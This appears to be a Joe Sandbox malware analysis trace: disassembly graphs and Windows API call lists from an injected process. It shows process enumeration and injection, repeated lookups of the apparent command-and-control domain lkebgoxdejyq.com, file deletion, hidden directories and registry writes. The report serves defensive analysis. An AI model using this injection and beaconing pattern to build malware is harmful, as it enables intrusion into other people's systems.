              • Instruction ID: ca0b99d1dfb8c508e53eb2ad015c6bf34acbebf6ea5b563c7c5418d36dc1ebbb
              • Opcode Fuzzy Hash: 57d19e234318a21f2b0c89695377393bf8fdbed8659455edca517ce897c98d3c
              • Instruction Fuzzy Hash: D4217A71500249EFEF129F60CC49BADBBB4EF10704F6841A9F958EE1A2D7309A61DB64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 113 d40d29-d40d3e 114 d40d44-d40d51 CreateToolhelp32Snapshot 113->114 114->114 115 d40d53-d40d86 Sleep Process32First 114->115 116 d40df6-d40e1c FindCloseChangeNotification Sleep 115->116 117 d40d88-d40d94 115->117 116->114 118 d40d95-d40da4 117->118 119 d40da6-d40dbb OpenProcess 118->119 120 d40dcf-d40de7 Process32Next 118->120 119->120 121 d40dbd-d40dc9 call d40e21 FindCloseChangeNotification 119->121 120->116 122 d40de9-d40deb 120->122 121->120 122->118 124 d40ded-d40df4 122->124 124->118
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D40D48
              • Sleep.KERNELBASE(000003E8), ref: 00D40D5E
              • Process32First.KERNEL32(?,00000000), ref: 00D40D7E
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00D40DB3
              • FindCloseChangeNotification.KERNELBASE(00000000,0000094C,00000000), ref: 00D40DC9
              • Process32Next.KERNEL32(?,?), ref: 00D40DDF
              • FindCloseChangeNotification.KERNELBASE(?), ref: 00D40E0B
              • Sleep.KERNELBASE(000003E8), ref: 00D40E16
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 1664173783-0
              • Opcode ID: 906d9b59944ca2996e4c0c1470c3d4f8f9543657b207ae87b4b0b306a21b53a3
              • Instruction ID: 1a795b71447d57073ef8fd41e4c4c55017daaa77c6465c5cffa8011a308ae38a
              • Opcode Fuzzy Hash: 906d9b59944ca2996e4c0c1470c3d4f8f9543657b207ae87b4b0b306a21b53a3
              • Instruction Fuzzy Hash: E4217F31901114ABEF225F64CC54AE9BBB9AF48700F0C01E9FA09FA195DB309E948F64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 126 d42d95-d42d9e call d438a7 129 d42da4-d42da9 126->129 130 d42bcc-d42bd0 126->130 129->130 131 d42daf-d42db8 129->131 132 d42bd2-d42c09 call d4377b inet_addr 130->132 133 d42c4a-d42c5a 130->133 131->130 135 d42dbe-d42dc1 131->135 140 d42cff-d42d38 call d4377b 132->140 141 d42c0f-d42c21 gethostbyname 132->141 134 d42c5c-d42c5f 133->134 134->134 137 d42c61-d42c67 134->137 135->130 138 d42dc7-d42dcd 135->138 142 d42c6c-d42c75 137->142 143 d42dcf-d42dd4 138->143 144 d42dda-d42ded call d42df8 138->144 156 d42d3d-d42d4b Sleep 140->156 145 d42c27-d42c44 Sleep gethostbyname 141->145 146 d42cf8-d42cfd 141->146 147 d42c77-d42c79 142->147 148 d42c7b-d42c7d 142->148 143->130 143->144 144->130 154 d42df3-d42df5 144->154 145->133 145->146 146->140 147->148 152 d42c7f-d42c80 147->152 148->142 152->142 155 d42c82-d42ca1 gethostbyname 152->155 155->146 157 d42ca3-d42cbc gethostbyname 155->157 156->156 158 d42d4d-d42d91 call d4377b call d423e3 call d42f93 call d42d95 156->158 157->146 159 d42cbe-d42cd7 gethostbyname 157->159 158->126 159->146 161 d42cd9-d42cf2 gethostbyname 159->161 161->130 161->146
              APIs
              • inet_addr.WS2_32(008C03E8), ref: 00D42C01
              • gethostbyname.WS2_32(00000000), ref: 00D42C19
              • Sleep.KERNEL32(00002710), ref: 00D42C2C
              • gethostbyname.WS2_32(00000000), ref: 00D42C3C
              • gethostbyname.WS2_32(0000002E), ref: 00D42C99
              • gethostbyname.WS2_32(00000000), ref: 00D42CB4
              • gethostbyname.WS2_32(00000000), ref: 00D42CCF
              • gethostbyname.WS2_32(00000000), ref: 00D42CEA
              • Sleep.KERNELBASE(00000001,?,702F5000,00000020), ref: 00D42D40
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: gethostbyname$Sleep$inet_addr
              • String ID: lkebgoxdejyq.com
              • API String ID: 2568590207-2004641040
              • Opcode ID: 63afafa1fc27a11c37fc0038e10235930c01e3df49bc3c1b0ea1ecf0b60e05f1
              • Instruction ID: f0b8519a36a6e9e67c80e7aaf517f53824f21417eff083afe3716c6a5902210e
              • Opcode Fuzzy Hash: 63afafa1fc27a11c37fc0038e10235930c01e3df49bc3c1b0ea1ecf0b60e05f1
              • Instruction Fuzzy Hash: 1541C3715002059FEF129F20C8C4BBA7BA9EF44701F894199FC89EF04ADB749A55CBB4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 169 d42a88-d42a95 call d4375b gethostbyname 172 d42a97-d42aa2 call d42bbb 169->172 173 d42a5e-d42a74 Sleep call d42a88 169->173 177 d42aa7-d42ab1 call d435ff 172->177 176 d42a79-d42a87 173->176 176->169 179 d42ab6-d42abd 177->179 179->172 180 d42abf-d42adb call d43547 call d426cd 179->180 185 d42add 180->185 186 d42b08-d42b1f call d426cd 180->186 185->186 187 d42adf-d42af4 call d42740 185->187 192 d42b21 186->192 193 d42b4c-d42b63 call d426cd 186->193 187->186 194 d42af6 187->194 192->193 195 d42b23-d42b38 call d42740 192->195 200 d42b65 193->200 201 d42b66-d42b7f call d42f93 193->201 194->186 198 d42af8-d42b02 DeleteFileA 194->198 195->193 204 d42b3a 195->204 198->186 200->201 207 d42b81-d42b8a call d43153 201->207 208 d42ba2-d42bb6 Sleep 201->208 204->193 206 d42b3c-d42b46 DeleteFileA 204->206 206->193 207->208 211 d42b8c-d42b9c DeleteFileA 207->211 208->179 211->208
              APIs
              • Sleep.KERNELBASE(00000064), ref: 00D42A60
                • Part of subcall function 00D42BBB: inet_addr.WS2_32(008C03E8), ref: 00D42C01
                • Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42C19
                • Part of subcall function 00D42BBB: Sleep.KERNEL32(00002710), ref: 00D42C2C
                • Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42C3C
                • Part of subcall function 00D42BBB: gethostbyname.WS2_32(0000002E), ref: 00D42C99
                • Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42CB4
                • Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42CCF
              • gethostbyname.WS2_32(00D42A79), ref: 00D42A8D
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 00D42B02
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 00D42B46
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 00D42B9C
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 00D42BB0
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: gethostbyname$DeleteFileSleep$inet_addr
              • String ID:
              • API String ID: 2694598323-0
              • Opcode ID: bae0c511f0b1c7365328c3a70ca679f768b9b1a1f437a03bbe7c44cbdd1b8e0b
              • Instruction ID: c358af0b3333f1b5b999e62024f6b270e8e21149e3b8d8f2be801d16fd14ac03
              • Opcode Fuzzy Hash: bae0c511f0b1c7365328c3a70ca679f768b9b1a1f437a03bbe7c44cbdd1b8e0b
              • Instruction Fuzzy Hash: D2312371500219AFEB226F71CC89FBB77BCEF90704F840599BA85EA055DE749680CEB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 212 d40b42-d40b61 call d40d05 call d40b68 217 d40b63-d40b66 212->217 217->217 218 d40b68-d40bb3 call d4375b LoadLibraryA call d40cdd call d40ba6 FindWindowA 217->218 225 d40bb5-d40bcd GetWindowThreadProcessId OpenProcess 218->225 226 d40bed-d40c0b call d408e2 call d40c80 call d40c9e call d40c18 218->226 225->226 227 d40bcf-d40bdc call d40e21 225->227 240 d40c7c-d40c7e 226->240 241 d40c0d-d40c10 226->241 227->226 234 d40bde-d40be3 227->234 234->226 236 d40be5-d40be7 ExitProcess 234->236 244 d40c90-d40c98 240->244 242 d40c12-d40c15 241->242 243 d40c5f-d40c6a 241->243 242->244 245 d40c17-d40c2d 242->245 249 d40c73 243->249 250 d40c6c-d40c72 243->250 246 d40c8c-d40c98 244->246 247 d40c9a-d40c9d 244->247 245->243 246->246 246->247 250->249
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Process$Window$ExitFindLibraryLoadOpenThread
              • String ID:
              • API String ID: 3976292551-0
              • Opcode ID: ccaaf8e2c46dd3cf7be227d4414d85501149980c7dd8dcef856fa594b72e5a4d
              • Instruction ID: d12e67f7b011f159780ca402e21ff91a8bb6b9adb2ab648ae4fba4ceb4f39253
              • Opcode Fuzzy Hash: ccaaf8e2c46dd3cf7be227d4414d85501149980c7dd8dcef856fa594b72e5a4d
              • Instruction Fuzzy Hash: D711A5719443056BEB012AB08C89FAA3A5CDF00704F0D44A6BF45EF196DA70984187B9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 251 d40b68-d40bb3 call d4375b LoadLibraryA call d40cdd call d40ba6 FindWindowA 258 d40bb5-d40bcd GetWindowThreadProcessId OpenProcess 251->258 259 d40bed-d40c0b call d408e2 call d40c80 call d40c9e call d40c18 251->259 258->259 260 d40bcf-d40bdc call d40e21 258->260 273 d40c7c-d40c7e 259->273 274 d40c0d-d40c10 259->274 260->259 267 d40bde-d40be3 260->267 267->259 269 d40be5-d40be7 ExitProcess 267->269 277 d40c90-d40c98 273->277 275 d40c12-d40c15 274->275 276 d40c5f-d40c6a 274->276 275->277 278 d40c17-d40c2d 275->278 282 d40c73 276->282 283 d40c6c-d40c72 276->283 279 d40c8c-d40c98 277->279 280 d40c9a-d40c9d 277->280 278->276 279->279 279->280 283->282
              APIs
              • LoadLibraryA.KERNEL32(00D40B61,00000007,?,00000000), ref: 00D40B6D
                • Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA
                • Part of subcall function 00D40BA6: FindWindowA.USER32(00D40B98,0000000E), ref: 00D40BAB
                • Part of subcall function 00D40BA6: GetWindowThreadProcessId.USER32(00000000), ref: 00D40BB8
                • Part of subcall function 00D40BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 00D40BC5
                • Part of subcall function 00D40BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 00D40BE7
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
              • String ID:
              • API String ID: 3081398214-0
              • Opcode ID: 0dd7f11518a3fcf72640f580a60b66e5f0517446295f17122682c526733adc48
              • Instruction ID: 824f95727845b0fd61b364bcb6fb23962abdeb7c1ce9586a670b700b67cbd19f
              • Opcode Fuzzy Hash: 0dd7f11518a3fcf72640f580a60b66e5f0517446295f17122682c526733adc48
              • Instruction Fuzzy Hash: C3018171A443457BEF112A708C89FAE3A5CEF00700F0D04A5BF45EE196DAB084418AB9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 301 d40ba6-d40bb3 call d4375b FindWindowA 304 d40bb5-d40bcd GetWindowThreadProcessId OpenProcess 301->304 305 d40bed call d408e2 301->305 304->305 306 d40bcf-d40bd5 call d40e21 304->306 309 d40bf2-d40c0b call d40c80 call d40c9e call d40c18 305->309 310 d40bda-d40bdc 306->310 319 d40c7c-d40c7e 309->319 320 d40c0d-d40c10 309->320 310->305 313 d40bde-d40be3 310->313 313->305 315 d40be5-d40be7 ExitProcess 313->315 323 d40c90-d40c98 319->323 321 d40c12-d40c15 320->321 322 d40c5f-d40c6a 320->322 321->323 324 d40c17-d40c2d 321->324 328 d40c73 322->328 329 d40c6c-d40c72 322->329 325 d40c8c-d40c98 323->325 326 d40c9a-d40c9d 323->326 324->322 325->325 325->326 329->328
              APIs
              • FindWindowA.USER32(00D40B98,0000000E), ref: 00D40BAB
              • GetWindowThreadProcessId.USER32(00000000), ref: 00D40BB8
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 00D40BC5
                • Part of subcall function 00D40E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,00D459C8,00003000,00000040,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E47
                • Part of subcall function 00D40E21: WriteProcessMemory.KERNELBASE(0000094C,00D40000,00000000,00D459C8,00000000,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E65
                • Part of subcall function 00D40E21: IsWow64Process.KERNEL32(0000094C,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E7B
              • ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 00D40BE7
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
              • String ID:
              • API String ID: 1790362231-0
              • Opcode ID: 0767fc97329c2b13fdc1e02381c328018a20f762073ca0b8be634015b2320ea5
              • Instruction ID: 4e7e51dfdf10cacf9a689a33423eed0a17f92e1d67a0f28a93328b94a9c466af
              • Opcode Fuzzy Hash: 0767fc97329c2b13fdc1e02381c328018a20f762073ca0b8be634015b2320ea5
              • Instruction Fuzzy Hash: A5110671609341AFEF112B708D89E6A3F69EF42700F1D41A5FA44DF0A3DA70C80297B9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 339 d426cd-d426f0 CreateFileA 340 d426f2-d42709 GetFileSize 339->340 341 d4273c-d4273d 339->341 342 d42730-d42739 CloseHandle 340->342 343 d4270b 340->343 342->341 343->342 344 d4270d-d42710 343->344 344->342 345 d42712-d4272a ReadFile 344->345 345->342 346 d4272c-d4272d 345->346 346->342
              APIs
              • CreateFileA.KERNELBASE(?,80000000,00000003,00000005,?,00000000), ref: 00D426E8
              • GetFileSize.KERNEL32(?,00000000), ref: 00D42701
              • ReadFile.KERNELBASE(?,?,FFFFFFFF,?,00000000), ref: 00D42722
              • CloseHandle.KERNEL32(?), ref: 00D42733
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: a703aba4250fb2f352420883e290b52ac44f1bfcff6a6a39faf4436f6d72e641
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: DA01E830640209BBEF119F60CC45B6DBAB8AF00B44F6441A9BA14F91E0D770AB61DA28

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 347 d42740-d42764 CreateFileA 348 d42766-d42781 SetFilePointer 347->348 349 d427af-d427b0 347->349 350 d427a3-d427ac CloseHandle 348->350 351 d42783-d4279d WriteFile 348->351 350->349 351->350 352 d4279f-d427a0 351->352 352->350
              APIs
              • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 00D4275C
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 00D42779
              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00D42795
              • CloseHandle.KERNEL32(?), ref: 00D427A6
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: b53456cd21a433158561c9759daabc36f8b4c73cf039959e51d24bcc0ab8b640
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: 8801F630640209BFEF119FA0DC45F9DBEB5BF04B14F6041A8BA14BD1E5D771AA20AB64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 353 d42a1f-d42a25 call d4375b lstrcat 356 d42a2b-d42a41 VirtualAlloc 353->356 356->356 357 d42a43 356->357 358 d42a45-d42a5c WSAStartup 357->358 358->358 359 d42a5e-d42a95 Sleep call d42a88 call d4375b gethostbyname 358->359 365 d42a97-d42aa2 call d42bbb 359->365 367 d42aa7-d42ab1 call d435ff 365->367 369 d42ab6-d42abd 367->369 369->365 370 d42abf-d42adb call d43547 call d426cd 369->370 375 d42add 370->375 376 d42b08-d42b1f call d426cd 370->376 375->376 377 d42adf-d42af4 call d42740 375->377 382 d42b21 376->382 383 d42b4c-d42b63 call d426cd 376->383 377->376 384 d42af6 377->384 382->383 385 d42b23-d42b38 call d42740 382->385 390 d42b65 383->390 391 d42b66-d42b7f call d42f93 383->391 384->376 388 d42af8-d42b02 DeleteFileA 384->388 385->383 394 d42b3a 385->394 388->376 390->391 397 d42b81-d42b8a call d43153 391->397 398 d42ba2-d42bb6 Sleep 391->398 394->383 396 d42b3c-d42b46 DeleteFileA 394->396 396->383 397->398 401 d42b8c-d42b9c DeleteFileA 397->401 398->369 401->398
              APIs
              • lstrcat.KERNEL32(00000000,00D42A16), ref: 00D42A25
              • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 00D42A39
              • WSAStartup.WS2_32(00000202,00000000), ref: 00D42A54
              • Sleep.KERNELBASE(00000064), ref: 00D42A60
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: AllocSleepStartupVirtuallstrcat
              • String ID:
              • API String ID: 434075115-0
              • Opcode ID: 5958a867a1279e4f59574b3d7822e65de73c963b2ca4c5d598a9c3848b79554c
              • Instruction ID: 7ae4f744377f2e23726d4c0ba34380a86bbb4c46451b122416d1296adf63ee7f
              • Opcode Fuzzy Hash: 5958a867a1279e4f59574b3d7822e65de73c963b2ca4c5d598a9c3848b79554c
              • Instruction Fuzzy Hash: A1F0B471240341AFFB129B708C4BF2A77ACAF10B41F540499BE86EE082DBB095108BB1
              APIs
              • RegCreateKeyExA.KERNELBASE(00000000,00D4086F,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 00D408A5
              • lstrlen.KERNEL32(80000001), ref: 00D408AE
              • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 00D408CC
              • RegCloseKey.KERNELBASE(?), ref: 00D408D8
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID:
              • API String ID: 1356686001-0
              • Opcode ID: 6288cf35a735a01df777dfb5869a3cd585be459f445e9b7a2041f7a878f31867
              • Instruction ID: 76a70b2cdc5de8bd425ef75c92c28fa2f3aea26a5343456680e1940a5a89c8ae
              • Opcode Fuzzy Hash: 6288cf35a735a01df777dfb5869a3cd585be459f445e9b7a2041f7a878f31867
              • Instruction Fuzzy Hash: 13E092B2100118BFEF126F60DC89E997B75EF54305F0440A0FE4AAD075CBB19AA0DF68
              APIs
              • VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413B3
              • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413C8
              • VirtualProtect.KERNELBASE(?,00000020,?,00D41434,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D4142F
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 5589b397c1f085e33905c3e3e552f402f77e3bb4902445c719e85d3e5bf65903
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 79219D31A0025AAFDB11DF78C849B9DBBB5AF04710F098225F959AF2D1E770E810CBA4
              APIs
              • CreateThread.KERNELBASE(Function_00000643,Function_00000643,00000000,00000000,00000000,00000000), ref: 00D4092A
              • CreateThread.KERNELBASE(Function_00002906,Function_00002906,00000000,00000000,00000000,00000000), ref: 00D40941
                • Part of subcall function 00D40D29: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D40D48
                • Part of subcall function 00D40D29: Sleep.KERNELBASE(000003E8), ref: 00D40D5E
                • Part of subcall function 00D40D29: Process32First.KERNEL32(?,00000000), ref: 00D40D7E
                • Part of subcall function 00D40D29: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00D40DB3
                • Part of subcall function 00D40D29: FindCloseChangeNotification.KERNELBASE(00000000,0000094C,00000000), ref: 00D40DC9
                • Part of subcall function 00D40D29: Process32Next.KERNEL32(?,?), ref: 00D40DDF
                • Part of subcall function 00D40D29: FindCloseChangeNotification.KERNELBASE(?), ref: 00D40E0B
                • Part of subcall function 00D40D29: Sleep.KERNELBASE(000003E8), ref: 00D40E16
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Create$ChangeCloseFindNotificationProcess32SleepThread$FirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2613248234-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: adfb4248778087f76d01eaa82a24b3ab4fd5cad4f9e899af1897270130052938
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: C7F082BA914504AFFF007FB09C89C7B3A9CEF403017440535FD46DA49ADE348C588975
              APIs
              • LoadLibraryA.KERNEL32(00D41522,00000006,?,00000000), ref: 00D4152D
                • Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA
                • Part of subcall function 00D41386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413B3
                • Part of subcall function 00D41386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413C8
                • Part of subcall function 00D41386: VirtualProtect.KERNELBASE(?,00000020,?,00D41434,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D4142F
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Virtual$Protect$AddressAllocLibraryLoadProc
              • String ID:
              • API String ID: 2821516111-0
              • Opcode ID: dc98e942ed6572570476fd510eaf228d67191d5608389ae8dfb7c1d45d059c83
              • Instruction ID: 26208938afcc5fdc08d3e939952782b49026242cd123655574f280d9b14aec38
              • Opcode Fuzzy Hash: dc98e942ed6572570476fd510eaf228d67191d5608389ae8dfb7c1d45d059c83
              • Instruction Fuzzy Hash: 84115FB24045149FDF03AF60D5C9CAA73ECEE40704B450A6AADC5EF44AEF749194CAF5
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: CreateThreadUser
              • String ID:
              • API String ID: 1531140918-0
              • Opcode ID: 14d2b1faf300dbb356a30ca305c1ce6f8e21fe939645fc129a070b0e5d482ed7
              • Instruction ID: c3372383a5a7fdb36eaf37a1b4586bddb6cf27023bf4fd810c1669143b9a6531
              • Opcode Fuzzy Hash: 14d2b1faf300dbb356a30ca305c1ce6f8e21fe939645fc129a070b0e5d482ed7
              • Instruction Fuzzy Hash: 99016D70518F0C8FD794EF1C9849B657BE0FBE8311F01875BA448C7271CA34D5888B82
              APIs
              • CreateMutexA.KERNELBASE(00000000,00000000), ref: 00D40666
                • Part of subcall function 00D40688: LoadLibraryA.KERNELBASE(00D4067F,00000009,?,00000000), ref: 00D4068D
                • Part of subcall function 00D40688: lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
                • Part of subcall function 00D40688: lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
                • Part of subcall function 00D40688: Sleep.KERNELBASE(00001388), ref: 00D4070A
                • Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
                • Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
                • Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
                • Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
                • Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
                • Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
                • Part of subcall function 00D40688: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Create$AttributesDirectoryFile$AllocLibraryLoadMutexSleepVirtuallstrcatlstrcmpi
              • String ID:
              • API String ID: 769654144-0
              • Opcode ID: fba5d1f79184c0cf2ad517d7be02013e5e7038f95750940897284c802d14dfb3
              • Instruction ID: 2e1ccece6226f7f15e7fa1d9c68ceb3524bdcc9936f2cbd5da927496b0a488f3
              • Opcode Fuzzy Hash: fba5d1f79184c0cf2ad517d7be02013e5e7038f95750940897284c802d14dfb3
              • Instruction Fuzzy Hash: D0E0C2711503157EEB029A708D89FAA779CEF00700F0841AAFF8A9E0C6E63014108676
              APIs
              • CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00001000,00D459C4,00000000,00000000), ref: 00D42E37
              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,00001000,00008000,00000000,?,00000000), ref: 00D42E74
                • Part of subcall function 00D42ECB: CryptAcquireContextA.ADVAPI32(00000000,00000000,00D42E9C,0000002F,?,00000000,00000001,F0000000), ref: 00D42EDC
                • Part of subcall function 00D42ECB: CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 00D42F02
                • Part of subcall function 00D42ECB: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 00D42F25
                • Part of subcall function 00D42ECB: CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 00D42F3F
                • Part of subcall function 00D42ECB: CryptVerifySignatureA.ADVAPI32(?,00000000,-00000004,?,00000000,00000000), ref: 00D42F5F
                • Part of subcall function 00D42ECB: CryptDestroyHash.ADVAPI32(?), ref: 00D42F6D
